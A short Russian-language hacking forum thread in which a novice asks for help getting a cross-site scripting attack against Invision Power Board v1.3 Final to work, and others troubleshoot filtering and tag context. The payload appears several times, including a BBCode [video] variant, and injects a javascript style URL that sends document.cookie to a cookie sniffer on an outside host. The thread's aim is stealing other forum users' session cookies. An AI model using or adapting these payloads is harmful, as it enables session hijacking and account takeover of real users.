Вопрос по использованию XSS на Powered by Invision Power Board(U) v1.3 Final
 

В форуме Powered by Invision Power Board(U) v1.3 Final © 2003 IPS, Inc.
вставляю :
'>` style=background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
И чето не каких кук в снифере не вижу!
Что я сделал неправильно? :confused:

В файнале фильтруются многие символы...
Посмотри Html
Кстати фильтр мешает ещё и спаренные тэги использовать

А можно чуть чуть по подробнее?
Я вставляю в сообщение эту фигню:
'>` style=background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
и она не меняеться не фига когда попадает в тему, так же и остаеться!

А к какому тэгу у тебя style в итоге относится?

Фиг знает....
Я же всетаки начанающий...

Вообще-то баг работает через определенные теги!
например:
Читай внимательнее инфу на сайте!!
http://antichat.ru/txt/IPB/

rsha1988, напиши как парсится в предпросмотре....

переведи...

Скажи, что получается в HTML

[video]http://1.ru e=`[/video]` style=display:none;background:none;background:url( javascript:docum ent.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) Lol - эт и получаеться!